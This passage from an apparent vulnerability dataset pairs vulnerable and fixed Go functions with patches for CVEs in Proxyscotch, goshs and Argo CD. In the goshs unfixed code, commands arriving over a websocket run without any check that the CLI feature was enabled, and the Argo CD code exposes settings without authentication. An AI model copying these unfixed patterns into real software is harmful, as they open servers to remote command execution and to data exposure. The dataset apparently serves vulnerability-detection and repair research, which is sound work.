empty JSON object.\n\tresponse.Header().Add(\"Content-Type\", \"application/json; charset=utf-8\")\n\tif request.Method != \"POST\" {\n\t\t_, _ = fmt.Fprintln(response, \"{\\\"success\\\": true, \\\"data\\\":{\\\"sessionFingerprint\\\":\\\"\"+sessionFingerprint+\"\\\", \\\"isProtected\\\":\"+strconv.FormatBool(len(accessToken) > 0)+\"}}\")\n\t\treturn\n\t}\n\n\t// Attempt to parse request body.\n\tvar requestData Request\n\tisMultipart := strings.HasPrefix(request.Header.Get(\"content-type\"), \"multipart/form-data\")\n\tvar multipartRequestDataKey = request.Header.Get(\"multipart-part-key\")\n\tif multipartRequestDataKey == \"\" {\n\t\tmultipartRequestDataKey = \"proxyRequestData\"\n\t}\n\tif isMultipart {\n\t\tvar err = request.ParseMultipartForm(maxMemory)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"Failed to parse request body: %v\", err)\n\t\t\t_, _ = fmt.Fprintln(response, ErrorBodyInvalidRequest)\n\t\t\treturn\n\t\t}\n\t\tr := request.MultipartForm.Value[multipartRequestDataKey]\n\t\terr = json.Unmarshal([]byte(r[0]), &requestData)\n\t\tif err != nil || len(requestData.Url) == 0 || len(requestData.Method) == 0 {\n\t\t\t// If the logged err is nil here, it means either the URL or method were not supplied\n\t\t\t// in the request data.\n\t\t\tlog.Printf(\"Failed to parse request body: %v\", err)\n\t\t\t_, _ = fmt.Fprintln(response, ErrorBodyInvalidRequest)\n\t\t\treturn\n\t\t}\n\t} else {\n\t\tvar err = json.NewDecoder(request.Body).Decode(&requestData)\n\t\tif err != nil || len(requestData.Url) == 0 || len(requestData.Method) == 0 {\n\t\t\t// If the logged err is nil here, it means either the URL or method were not supplied\n\t\t\t// in the request data.\n\t\t\tlog.Printf(\"Failed to parse request body: %v\", err)\n\t\t\t_, _ = fmt.Fprintln(response, ErrorBodyInvalidRequest)\n\t\t\treturn\n\t\t}\n\t}\n\n\tif len(accessToken) > 0 && requestData.AccessToken != accessToken {\n\t\tlog.Print(\"An unauthorized request was made.\")\n\t\t_, _ = fmt.Fprintln(response, \"{\\\"success\\\": false, \\\"data\\\":{\\\"message\\\":\\\"(Proxy Error) Unauthorized request; you may need to set your access token in Settings.\\\"}}\")\n\t\treturn\n\t}\n\n\t// Make the request\n\tvar proxyRequest http.Request\n\tproxyRequest.Header = make(http.Header)\n\tproxyRequest.Method = requestData.Method\n\tproxyRequest.URL, _ = url.Parse(requestData.Url)\n\n\t// Block requests to illegal destinations\n\tif !isAllowedDest(proxyRequest.URL.Hostname()) {\n\t\tlog.Print(\"A request to a banned destination was made.\")\n\t\t_, _ = fmt.Fprintln(response, \"{\\\"success\\\": false, \\\"data\\\":{\\\"message\\\":\\\"(Proxy Error) Request cannot be to this destination.\\\"}}\")\n\t\treturn\n\t}\n\n\tvar params = proxyRequest.URL.Query()\n\n\tfor k, v := range requestData.Params {\n\t\tparams.Set(k, v)\n\t}\n\tproxyRequest.URL.RawQuery = params.Encode()\n\n\tif len(requestData.Auth.Username) > 0 && len(requestData.Auth.Password) > 0 {\n\t\tproxyRequest.SetBasicAuth(requestData.Auth.Username, requestData.Auth.Password)\n\t}\n\tfor k, v := range requestData.Headers {\n\t\tproxyRequest.Header.Set(k, v)\n\t}\n\n\tproxyRequest.Header.Set(\"User-Agent\", \"Proxyscotch/1.1\")\n\n\tif isMultipart {\n\t\tbody := &bytes.Buffer{}\n\t\twriter := multipart.NewWriter(body)\n\t\tfor key := range request.MultipartForm.Value {\n\t\t\tif key == multipartRequestDataKey {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tfor _, val := range request.MultipartForm.Value[key] {\n\t\t\t\t// This usually never happens, mostly memory issue\n\t\t\t\terr := writer.WriteField(key, val)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Printf(\"Failed to write multipart field key: %s error: %v\", key, err)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tfor fileKey := range request.MultipartForm.File {\n\t\t\tfor _, val := range request.MultipartForm.File[fileKey] {\n\t\t\t\tf, err := val.Open()\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Printf(\"Failed to write multipart field: %s err: %v\", fileKey, err)\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tfield, _ := writer.CreatePart(val.Header)\n\t\t\t\t_, err = io.Copy(field, f)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Printf(\"Failed to write multipart field: %s err: %v\", fileKey, err)\n\t\t\t\t}\n\t\t\t\t// Close need not be handled, as go will clear temp file\n\t\t\t\tdefer func(f multipart.File) {\n\t\t\t\t\terr := f.Close()\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlog.Printf(\"Failed to close file\")\n\t\t\t\t\t}\n\t\t\t\t}(f)\n\t\t\t}\n\t\t}\n\t\terr := writer.Close()\n\t\tif err != nil {\n\t\t\tlog.Printf(\"Failed to write multipart content: %v\", err)\n\t\t\t_, _ = fmt.Fprintf(response, ErrorBodyProxyRequestFailed)\n\t\t\tif err != nil {\n\t\t\t\treturn\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t\tcontentType := fmt.Sprintf(\"multipart/form-data; boundary=%v\", writer.Boundary())\n\t\tproxyRequest.Header.Set(\"content-type\", contentType)\n\t\tproxyRequest.Body = ioutil.NopCloser(bytes.NewReader(body.Bytes()))\n\t\tproxyRequest.Body.Close()\n\t} else if len(requestData.Data) > 0 {\n\t\tproxyRequest.Body = ioutil.NopCloser(strings.NewReader(requestData.Data))\n\t\tproxyRequest.Body.Close()\n\t}\n\n\tvar client http.Client\n\tvar proxyResponse *http.Response\n\tproxyResponse, err := client.Do(&proxyRequest)\n\n\tif err != nil {\n\t\tlog.Print(\"Failed to write response body: \", err.Error())\n\t\t_, _ = fmt.Fprintln(response, ErrorBodyProxyRequestFailed)\n\t\treturn\n\t}\n\n\tvar responseData Response\n\tresponseData.Success = true\n\tresponseData.Status = proxyResponse.StatusCode\n\tresponseData.StatusText = strings.Join(strings.Split(proxyResponse.Status, \" \")[1:], \" \")\n\tresponseBytes, err := ioutil.ReadAll(proxyResponse.Body)\n\tresponseData.Headers = headerToArray(proxyResponse.Header)\n\n\tif requestData.WantsBinary {\n\t\tfor _, bannedOutput := range bannedOutputs {\n\t\t\tresponseBytes = bytes.ReplaceAll(responseBytes, []byte(bannedOutput), []byte(\"[redacted]\"))\n\t\t}\n\n\t\t// If using the new binary format, encode the response body.\n\t\tresponseData.Data = base64.RawStdEncoding.EncodeToString(responseBytes)\n\t\tresponseData.IsBinary = true\n\t} else {\n\t\t// Otherwise, simply return the old format.\n\t\tresponseData.Data = string(responseBytes)\n\n\t\tfor _, bannedOutput := range bannedOutputs {\n\t\t\tresponseData.Data = strings.Replace(responseData.Data, bannedOutput, \"[redacted]\", -1)\n\t\t}\n\t}\n\n\t// Write the request body to the response.\n\terr = json.NewEncoder(response).Encode(responseData)\n\n\t// Return the response.\n\tif err != nil {\n\t\tlog.Print(\"Failed to write response body: \", err.Error())\n\t\t_, _ = fmt.Fprintln(response, ErrorBodyProxyRequestFailed)\n\t\treturn\n\t}\n}"}, {"id": "fix_go_240_4", "commit": "de67380f62f907f201d75854b76024ba4885fab7", "file_path": "server/server.go", "start_line": 10, "end_line": 23, "snippet": "func main() {\n\thostPtr := flag.String(\"host\", \"localhost:9159\", \"the hostname that the server should listen on.\")\n\ttokenPtr := flag.String(\"token\", \"\", \"the Proxy Access Token used to restrict access to the server.\")\n\tallowedOriginsPtr := flag.String(\"allowed-origins\", \"*\", \"a comma separated list of allowed origins.\")\n\tbannedOutputsPtr := flag.String(\"banned-outputs\", \"\", \"a comma separated list of banned outputs.\")\n\tbannedDestsPtr := flag.String(\"banned-dests\", \"\", \"a comma separated list of banned proxy destinations.\")\n\n\tflag.Parse()\n\n\tfinished := make(chan bool)\n\tlibproxy.Initialize(*tokenPtr, *hostPtr, *allowedOriginsPtr, *bannedOutputsPtr, *bannedDestsPtr, onProxyStateChangeServer, false, finished)\n\n\t<-finished\n}"}, {"id": "fix_go_240_5", "commit": "de67380f62f907f201d75854b76024ba4885fab7", "file_path": "libproxy/proxy.go", "start_line": 53, "end_line": 62, "snippet": "func isAllowedDest(dest string) bool {\n\tfor _, b := range bannedDests {\n\t\tif b == dest {\n\t\t\treturn false\n\t\t}\n\t}\n\n\treturn true\n}\n"}], "vul_patch": "--- a/libproxy/proxy.go\n+++ b/libproxy/proxy.go\n@@ -3,4 +3,5 @@\n \tsessionFingerprint string\n \tallowedOrigins []string\n \tbannedOutputs []string\n+\tbannedDests []string\n )\n\n--- a/libproxy/proxy.go\n+++ b/libproxy/proxy.go\n@@ -3,12 +3,18 @@\n \tproxyURL string,\n \tinitialAllowedOrigins string,\n \tinitialBannedOutputs string,\n+\tinitialBannedDests string,\n \tonStatusChange statusChangeFunction,\n \twithSSL bool,\n \tfinished chan bool,\n ) {\n \tif initialBannedOutputs != \"\" {\n \t\tbannedOutputs = strings.Split(initialBannedOutputs, \",\")\n+\t}\n+\tif initialBannedDests != \"\" {\n+\t\tbannedDests = strings.Split(initialBannedDests, \",\")\n+\t} else {\n+\t\tbannedDests = []string{}\n \t}\n \tallowedOrigins = strings.Split(initialAllowedOrigins, \",\")\n \taccessToken = initialAccessToken\n\n--- a/libproxy/proxy.go\n+++ b/libproxy/proxy.go\n@@ -78,6 +78,13 @@\n \tproxyRequest.Header = make(http.Header)\n \tproxyRequest.Method = requestData.Method\n \tproxyRequest.URL, _ = url.Parse(requestData.Url)\n+\n+\t// Block requests to illegal destinations\n+\tif !isAllowedDest(proxyRequest.URL.Hostname()) {\n+\t\tlog.Print(\"A request to a banned destination was made.\")\n+\t\t_, _ = fmt.Fprintln(response, \"{\\\"success\\\": false, \\\"data\\\":{\\\"message\\\":\\\"(Proxy Error) Request cannot be to this destination.\\\"}}\")\n+\t\treturn\n+\t}\n \n \tvar params = proxyRequest.URL.Query()\n \n\n--- a/server/server.go\n+++ b/server/server.go\n@@ -3,10 +3,12 @@\n \ttokenPtr := flag.String(\"token\", \"\", \"the Proxy Access Token used to restrict access to the server.\")\n \tallowedOriginsPtr := flag.String(\"allowed-origins\", \"*\", \"a comma separated list of allowed origins.\")\n \tbannedOutputsPtr := flag.String(\"banned-outputs\", \"\", \"a comma separated list of banned outputs.\")\n+\tbannedDestsPtr := flag.String(\"banned-dests\", \"\", \"a comma separated list of banned proxy destinations.\")\n+\n \tflag.Parse()\n \n \tfinished := make(chan bool)\n-\tlibproxy.Initialize(*tokenPtr, *hostPtr, *allowedOriginsPtr, *bannedOutputsPtr, onProxyStateChangeServer, false, finished)\n+\tlibproxy.Initialize(*tokenPtr, *hostPtr, *allowedOriginsPtr, *bannedOutputsPtr, *bannedDestsPtr, onProxyStateChangeServer, false, finished)\n \n \t<-finished\n }\n\n--- /dev/null\n+++ b/server/server.go\n@@ -0,0 +1,9 @@\n+func isAllowedDest(dest string) bool {\n+\tfor _, b := range bannedDests {\n+\t\tif b == dest {\n+\t\t\treturn false\n+\t\t}\n+\t}\n+\n+\treturn true\n+}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-46816", "cve_description": "goshs is a SimpleHTTPServer written in Go. Starting in version 0.3.4 and prior to version 1.0.5, running goshs without arguments makes it possible for anyone to execute commands on the server. The function `dispatchReadPump` does not checks the option cli `-c`, thus allowing anyone to execute arbitrary command through the use of websockets. Version 1.0.5 fixes the issue.", "cwe_info": {"CWE-284": {"name": "Improper Access Control", "description": "The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor."}}, "repo": "https://github.com/patrickhener/goshs", "patch_url": ["https://github.com/patrickhener/goshs/commit/160220974576afe5111485b8d12fd36058984cfa"], "programing_language": "Go", "vul_func": [{"id": "vul_go_222_1", "commit": "cd1cbfd", "file_path": "httpserver/server.go", "start_line": 192, "end_line": 259, "snippet": "func (fs *FileServer) Start(what string) {\n\t// Setup routing with gorilla/mux\n\tmux := NewCustomMux()\n\n\taddr := fs.SetupMux(mux, what)\n\n\t// construct and bind listener\n\tlistener, err := net.Listen(\"tcp\", addr)\n\tif err != nil {\n\t\tlogger.Fatalf(\"Error binding to listener '%s': %+v\", addr, err)\n\t}\n\tdefer func() {\n\t\tif err := listener.Close(); err != nil {\n\t\t\tlogger.Errorf(\"error closing tcp listener: %+v\", err)\n\t\t}\n\t}()\n\n\t// construct server\n\tserver := http.Server{\n\t\t// Addr: addr,\n\t\tHandler: http.AllowQuerySemicolons(mux),\n\t\tReadHeaderTimeout: 10 * time.Second, // Mitigate Slow Loris Attack\n\t\tErrorLog: log.New(io.Discard, \"\", 0),\n\t\t// Against good practice no timeouts here, otherwise big files would be terminated when downloaded\n\t}\n\n\t// init clipboard\n\tif !fs.NoClipboard {\n\t\tfs.Clipboard = clipboard.New()\n\n\t\t// init websocket hub\n\t\tfs.Hub = ws.NewHub(fs.Clipboard)\n\t\tgo fs.Hub.Run()\n\t}\n\n\t// Print silent banner\n\tif fs.Silent {\n\t\tlogger.Info(\"Serving in silent mode - no dir listing available at HTTP Listener\")\n\t}\n\n\t// Print all embedded files as info to the console\n\tfs.PrintEmbeddedFiles()\n\n\t// Register webhook\n\tif fs.WebhookEnable {\n\t\tswitch strings.ToLower(fs.WebhookProvider) {\n\t\tcase \"discord\":\n\t\t\tfs.Webhook = &webhook.DiscordWebhook{\n\t\t\t\tURL: fs.WebhookURL,\n\t\t\t\tUsername: \"goshs\",\n\t\t\t}\n\t\tcase \"slack\":\n\t\t\tfs.Webhook = &webhook.SlackWebhook{\n\t\t\t\tURL: fs.WebhookURL,\n\t\t\t}\n\t\tcase \"mattermost\":\n\t\t\tfs.Webhook = &webhook.MattermostWebhook{\n\t\t\t\tURL: fs.WebhookURL,\n\t\t\t\tUsername: \"goshs\",\n\t\t\t}\n\t\tdefault:\n\t\t\tlogger.Fatalf(\"Webhook provider '%s' not supported\", fs.WebhookProvider)\n\t\t}\n\t}\n\n\t// Start listener\n\tfs.StartListener(server, what, listener)\n}"}, {"id": "vul_go_222_2", "commit": "cd1cbfd", "file_path": "ws/client.go", "start_line": 80, "end_line": 130, "snippet": "func (c *Client) dispatchReadPump(packet Packet) {\n\t// Switch here over possible socket events and pull in handlers\n\tswitch packet.Type {\n\tcase \"newEntry\":\n\t\tvar entry string\n\t\tif err := json.Unmarshal(packet.Content, &entry); err != nil {\n\t\t\tlogger.Errorf(\"Error reading json packet: %+v\", err)\n\t\t}\n\t\tif err := c.hub.cb.AddEntry(entry); err != nil {\n\t\t\tlogger.Errorf(\"Error creating Clipboard entry: %+v\", err)\n\t\t}\n\t\tc.refreshClipboard()\n\n\tcase \"delEntry\":\n\t\tvar id string\n\t\tif err := json.Unmarshal(packet.Content, &id); err != nil {\n\t\t\tlogger.Errorf(\"Error reading json packet: %+v\", err)\n\t\t}\n\t\tiid, err := strconv.Atoi(id)\n\t\tif err != nil {\n\t\t\tlogger.Errorf(\"Error reading json packet: %+v\", err)\n\t\t}\n\t\tif err := c.hub.cb.DeleteEntry(iid); err != nil {\n\t\t\tlogger.Errorf(\"Error to delete Clipboard entry with id: %s: %+v\", string(packet.Content), err)\n\t\t}\n\t\tc.refreshClipboard()\n\n\tcase \"clearClipboard\":\n\t\tif err := c.hub.cb.ClearClipboard(); err != nil {\n\t\t\tlogger.Errorf(\"Error clearing clipboard: %+v\", err)\n\t\t}\n\t\tc.refreshClipboard()\n\n\tcase \"command\":\n\t\tvar command string\n\t\tif err := json.Unmarshal(packet.Content, &command); err != nil {\n\t\t\tlogger.Errorf(\"Error reading json packet: %+v\", err)\n\t\t}\n\t\tlogger.Debugf(\"Command was: %+v\", command)\n\t\toutput, err := cli.RunCMD(command)\n\t\tif err != nil {\n\t\t\tlogger.Errorf(\"Error running command: %+v\", err)\n\t\t}\n\t\tlogger.Debugf(\"Output: %+v\", output)\n\t\tc.updateCLI(output)\n\n\tdefault:\n\t\tlogger.Warnf(\"The event sent via websocket cannot be handeled: %+v\", packet.Type)\n\t}\n\n}"}, {"id": "vul_go_222_3", "commit": "cd1cbfd", "file_path": "ws/hub.go", "start_line": 9, "end_line": 24, "snippet": "type Hub struct {\n\t// Registered clients.\n\tclients map[*Client]bool\n\n\t// Inbound messages from the clients.\n\tbroadcast chan []byte\n\n\t// Register requests from the clients.\n\tregister chan *Client\n\n\t// Unregister requests from clients.\n\tunregister chan *Client\n\n\t// Handle clipboard\n\tcb *clipboard.Clipboard\n}"}, {"id": "vul_go_222_4", "commit": "cd1cbfd", "file_path": "ws/hub.go", "start_line": 27, "end_line": 35, "snippet": "func NewHub(cb *clipboard.Clipboard) *Hub {\n\treturn &Hub{\n\t\tbroadcast: make(chan []byte),\n\t\tregister: make(chan *Client),\n\t\tunregister: make(chan *Client),\n\t\tclients: make(map[*Client]bool),\n\t\tcb: cb,\n\t}\n}"}], "fix_func": [{"id": "fix_go_222_1", "commit": "160220974576afe5111485b8d12fd36058984cfa", "file_path": "httpserver/server.go", "start_line": 192, "end_line": 259, "snippet": "func (fs *FileServer) Start(what string) {\n\t// Setup routing with gorilla/mux\n\tmux := NewCustomMux()\n\n\taddr := fs.SetupMux(mux, what)\n\n\t// construct and bind listener\n\tlistener, err := net.Listen(\"tcp\", addr)\n\tif err != nil {\n\t\tlogger.Fatalf(\"Error binding to listener '%s': %+v\", addr, err)\n\t}\n\tdefer func() {\n\t\tif err := listener.Close(); err != nil {\n\t\t\tlogger.Errorf(\"error closing tcp listener: %+v\", err)\n\t\t}\n\t}()\n\n\t// construct server\n\tserver := http.Server{\n\t\t// Addr: addr,\n\t\tHandler: http.AllowQuerySemicolons(mux),\n\t\tReadHeaderTimeout: 10 * time.Second, // Mitigate Slow Loris Attack\n\t\tErrorLog: log.New(io.Discard, \"\", 0),\n\t\t// Against good practice no timeouts here, otherwise big files would be terminated when downloaded\n\t}\n\n\t// init clipboard\n\tif !fs.NoClipboard {\n\t\tfs.Clipboard = clipboard.New()\n\n\t\t// init websocket hub\n\t\tfs.Hub = ws.NewHub(fs.Clipboard, fs.CLI)\n\t\tgo fs.Hub.Run()\n\t}\n\n\t// Print silent banner\n\tif fs.Silent {\n\t\tlogger.Info(\"Serving in silent mode - no dir listing available at HTTP Listener\")\n\t}\n\n\t// Print all embedded files as info to the console\n\tfs.PrintEmbeddedFiles()\n\n\t// Register webhook\n\tif fs.WebhookEnable {\n\t\tswitch strings.ToLower(fs.WebhookProvider) {\n\t\tcase \"discord\":\n\t\t\tfs.Webhook = &webhook.DiscordWebhook{\n\t\t\t\tURL: fs.WebhookURL,\n\t\t\t\tUsername: \"goshs\",\n\t\t\t}\n\t\tcase \"slack\":\n\t\t\tfs.Webhook = &webhook.SlackWebhook{\n\t\t\t\tURL: fs.WebhookURL,\n\t\t\t}\n\t\tcase \"mattermost\":\n\t\t\tfs.Webhook = &webhook.MattermostWebhook{\n\t\t\t\tURL: fs.WebhookURL,\n\t\t\t\tUsername: \"goshs\",\n\t\t\t}\n\t\tdefault:\n\t\t\tlogger.Fatalf(\"Webhook provider '%s' not supported\", fs.WebhookProvider)\n\t\t}\n\t}\n\n\t// Start listener\n\tfs.StartListener(server, what, listener)\n}"}, {"id": "fix_go_222_2", "commit": "160220974576afe5111485b8d12fd36058984cfa", "file_path": "ws/client.go", "start_line": 80, "end_line": 132, "snippet": "func (c *Client) dispatchReadPump(packet Packet) {\n\t// Switch here over possible socket events and pull in handlers\n\tswitch packet.Type {\n\tcase \"newEntry\":\n\t\tvar entry string\n\t\tif err := json.Unmarshal(packet.Content, &entry); err != nil {\n\t\t\tlogger.Errorf(\"Error reading json packet: %+v\", err)\n\t\t}\n\t\tif err := c.hub.cb.AddEntry(entry); err != nil {\n\t\t\tlogger.Errorf(\"Error creating Clipboard entry: %+v\", err)\n\t\t}\n\t\tc.refreshClipboard()\n\n\tcase \"delEntry\":\n\t\tvar id string\n\t\tif err := json.Unmarshal(packet.Content, &id); err != nil {\n\t\t\tlogger.Errorf(\"Error reading json packet: %+v\", err)\n\t\t}\n\t\tiid, err := strconv.Atoi(id)\n\t\tif err != nil {\n\t\t\tlogger.Errorf(\"Error reading json packet: %+v\", err)\n\t\t}\n\t\tif err := c.hub.cb.DeleteEntry(iid); err != nil {\n\t\t\tlogger.Errorf(\"Error to delete Clipboard entry with id: %s: %+v\", string(packet.Content), err)\n\t\t}\n\t\tc.refreshClipboard()\n\n\tcase \"clearClipboard\":\n\t\tif err := c.hub.cb.ClearClipboard(); err != nil {\n\t\t\tlogger.Errorf(\"Error clearing clipboard: %+v\", err)\n\t\t}\n\t\tc.refreshClipboard()\n\n\tcase \"command\":\n\t\tif c.hub.cliEnabled {\n\t\t\tvar command string\n\t\t\tif err := json.Unmarshal(packet.Content, &command); err != nil {\n\t\t\t\tlogger.Errorf(\"Error reading json packet: %+v\", err)\n\t\t\t}\n\t\t\tlogger.Debugf(\"Command was: %+v\", command)\n\t\t\toutput, err := cli.RunCMD(command)\n\t\t\tif err != nil {\n\t\t\t\tlogger.Errorf(\"Error running command: %+v\", err)\n\t\t\t}\n\t\t\tlogger.Debugf(\"Output: %+v\", output)\n\t\t\tc.updateCLI(output)\n\t\t}\n\n\tdefault:\n\t\tlogger.Warnf(\"The event sent via websocket cannot be handeled: %+v\", packet.Type)\n\t}\n\n}"}, {"id": "fix_go_222_3", "commit": "160220974576afe5111485b8d12fd36058984cfa", "file_path": "ws/hub.go", "start_line": 9, "end_line": 27, "snippet": "type Hub struct {\n\t// Registered clients.\n\tclients map[*Client]bool\n\n\t// Inbound messages from the clients.\n\tbroadcast chan []byte\n\n\t// Register requests from the clients.\n\tregister chan *Client\n\n\t// Unregister requests from clients.\n\tunregister chan *Client\n\n\t// Handle clipboard\n\tcb *clipboard.Clipboard\n\n\t// CLI Enabled\n\tcliEnabled bool\n}"}, {"id": "fix_go_222_4", "commit": "160220974576afe5111485b8d12fd36058984cfa", "file_path": "ws/hub.go", "start_line": 30, "end_line": 39, "snippet": "func NewHub(cb *clipboard.Clipboard, cliEnabled bool) *Hub {\n\treturn &Hub{\n\t\tbroadcast: make(chan []byte),\n\t\tregister: make(chan *Client),\n\t\tunregister: make(chan *Client),\n\t\tclients: make(map[*Client]bool),\n\t\tcb: cb,\n\t\tcliEnabled: cliEnabled,\n\t}\n}"}], "vul_patch": "--- a/httpserver/server.go\n+++ b/httpserver/server.go\n@@ -29,7 +29,7 @@\n \t\tfs.Clipboard = clipboard.New()\n \n \t\t// init websocket hub\n-\t\tfs.Hub = ws.NewHub(fs.Clipboard)\n+\t\tfs.Hub = ws.NewHub(fs.Clipboard, fs.CLI)\n \t\tgo fs.Hub.Run()\n \t}\n \n\n--- a/ws/client.go\n+++ b/ws/client.go\n@@ -32,17 +32,19 @@\n \t\tc.refreshClipboard()\n \n \tcase \"command\":\n-\t\tvar command string\n-\t\tif err := json.Unmarshal(packet.Content, &command); err != nil {\n-\t\t\tlogger.Errorf(\"Error reading json packet: %+v\", err)\n+\t\tif c.hub.cliEnabled {\n+\t\t\tvar command string\n+\t\t\tif err := json.Unmarshal(packet.Content, &command); err != nil {\n+\t\t\t\tlogger.Errorf(\"Error reading json packet: %+v\", err)\n+\t\t\t}\n+\t\t\tlogger.Debugf(\"Command was: %+v\", command)\n+\t\t\toutput, err := cli.RunCMD(command)\n+\t\t\tif err != nil {\n+\t\t\t\tlogger.Errorf(\"Error running command: %+v\", err)\n+\t\t\t}\n+\t\t\tlogger.Debugf(\"Output: %+v\", output)\n+\t\t\tc.updateCLI(output)\n \t\t}\n-\t\tlogger.Debugf(\"Command was: %+v\", command)\n-\t\toutput, err := cli.RunCMD(command)\n-\t\tif err != nil {\n-\t\t\tlogger.Errorf(\"Error running command: %+v\", err)\n-\t\t}\n-\t\tlogger.Debugf(\"Output: %+v\", output)\n-\t\tc.updateCLI(output)\n \n \tdefault:\n \t\tlogger.Warnf(\"The event sent via websocket cannot be handeled: %+v\", packet.Type)\n\n--- a/ws/hub.go\n+++ b/ws/hub.go\n@@ -13,4 +13,7 @@\n \n \t// Handle clipboard\n \tcb *clipboard.Clipboard\n+\n+\t// CLI Enabled\n+\tcliEnabled bool\n }\n\n--- a/ws/hub.go\n+++ b/ws/hub.go\n@@ -1,9 +1,10 @@\n-func NewHub(cb *clipboard.Clipboard) *Hub {\n+func NewHub(cb *clipboard.Clipboard, cliEnabled bool) *Hub {\n \treturn &Hub{\n \t\tbroadcast: make(chan []byte),\n \t\tregister: make(chan *Client),\n \t\tunregister: make(chan *Client),\n \t\tclients: make(map[*Client]bool),\n \t\tcb: cb,\n+\t\tcliEnabled: cliEnabled,\n \t}\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-37152", "cve_description": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The vulnerability allows unauthorized access to the sensitive settings exposed by /api/v1/settings endpoint without authentication. All sensitive settings are hidden except passwordPattern. This vulnerability is fixed in 2.11.3, 2.10.12, and 2.9.17.", "cwe_info": {"CWE-306": {"name": "Missing Authentication for Critical Function", "description": "The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources."}}, "repo": "https://github.com/argoproj/argo-cd", "patch_url": ["https://github.com/argoproj/argo-cd/commit/256d90178b11b04bc8174d08d7b663a2a7b1771b"], "programing_language": "Go", "vul_func": [{"id": "vul_go_259_1", "commit": "60cdd7dde2bd9d784ae38af48dbb42f1416783ee", "file_path": "server/settings/settings.go", "start_line": 39, "end_line": 146, "snippet": "func (s *Server) Get(ctx context.Context, q *settingspkg.SettingsQuery) (*settingspkg.Settings, error) {\n\tresourceOverrides, err := s.mgr.GetResourceOverrides()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\toverrides := make(map[string]*v1alpha1.ResourceOverride)\n\tfor k := range resourceOverrides {\n\t\tval := resourceOverrides[k]\n\t\toverrides[k] = &val\n\t}\n\tappInstanceLabelKey, err := s.mgr.GetAppInstanceLabelKey()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\targoCDSettings, err := s.mgr.GetSettings()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tgaSettings, err := s.mgr.GetGoogleAnalytics()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\thelp, err := s.mgr.GetHelp()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tuserLoginsDisabled := true\n\taccounts, err := s.mgr.GetAccounts()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, account := range accounts {\n\t\tif account.Enabled && account.HasCapability(settings.AccountCapabilityLogin) {\n\t\t\tuserLoginsDisabled = false\n\t\t\tbreak\n\t\t}\n\t}\n\n\tkustomizeSettings, err := s.mgr.GetKustomizeSettings()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tvar kustomizeVersions []string\n\tfor i := range kustomizeSettings.Versions {\n\t\tkustomizeVersions = append(kustomizeVersions, kustomizeSettings.Versions[i].Name)\n\t}\n\n\ttrackingMethod, err := s.mgr.GetTrackingMethod()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tset := settingspkg.Settings{\n\t\tURL: argoCDSettings.URL,\n\t\tAppLabelKey: appInstanceLabelKey,\n\t\tResourceOverrides: overrides,\n\t\tStatusBadgeEnabled: argoCDSettings.StatusBadgeEnabled,\n\t\tStatusBadgeRootUrl: argoCDSettings.StatusBadgeRootUrl,\n\t\tKustomizeOptions: &v1alpha1.KustomizeOptions{\n\t\t\tBuildOptions: argoCDSettings.KustomizeBuildOptions,\n\t\t},\n\t\tGoogleAnalytics: &settingspkg.GoogleAnalyticsConfig{\n\t\t\tTrackingID: gaSettings.TrackingID,\n\t\t\tAnonymizeUsers: gaSettings.AnonymizeUsers,\n\t\t},\n\t\tHelp: &settingspkg.Help{\n\t\t\tChatUrl: help.ChatURL,\n\t\t\tChatText: help.ChatText,\n\t\t\tBinaryUrls: help.BinaryURLs,\n\t\t},\n\t\tUserLoginsDisabled: userLoginsDisabled,\n\t\tKustomizeVersions: kustomizeVersions,\n\t\tUiCssURL: argoCDSettings.UiCssURL,\n\t\tPasswordPattern: argoCDSettings.PasswordPattern,\n\t\tTrackingMethod: trackingMethod,\n\t\tExecEnabled: argoCDSettings.ExecEnabled,\n\t\tAppsInAnyNamespaceEnabled: s.appsInAnyNamespaceEnabled,\n\t}\n\n\tif sessionmgr.LoggedIn(ctx) || s.disableAuth {\n\t\tset.UiBannerContent = argoCDSettings.UiBannerContent\n\t\tset.UiBannerURL = argoCDSettings.UiBannerURL\n\t\tset.UiBannerPermanent = argoCDSettings.UiBannerPermanent\n\t\tset.UiBannerPosition = argoCDSettings.UiBannerPosition\n\t\tset.ControllerNamespace = s.mgr.GetNamespace()\n\t}\n\tif argoCDSettings.DexConfig != \"\" {\n\t\tvar cfg settingspkg.DexConfig\n\t\terr = yaml.Unmarshal([]byte(argoCDSettings.DexConfig), &cfg)\n\t\tif err == nil {\n\t\t\tset.DexConfig = &cfg\n\t\t}\n\t}\n\tif oidcConfig := argoCDSettings.OIDCConfig(); oidcConfig != nil {\n\t\tset.OIDCConfig = &settingspkg.OIDCConfig{\n\t\t\tName: oidcConfig.Name,\n\t\t\tIssuer: oidcConfig.Issuer,\n\t\t\tClientID: oidcConfig.ClientID,\n\t\t\tCLIClientID: oidcConfig.CLIClientID,\n\t\t\tScopes: oidcConfig.RequestedScopes,\n\t\t\tEnablePKCEAuthentication: oidcConfig.EnablePKCEAuthentication,\n\t\t}\n\t\tif len(argoCDSettings.OIDCConfig().RequestedIDTokenClaims) > 0 {\n\t\t\tset.OIDCConfig.IDTokenClaims = argoCDSettings.OIDCConfig().RequestedIDTokenClaims\n\t\t}\n\t}\n\treturn &set, nil\n}"}], "fix_func": [{"id": "fix_go_259_1", "commit": 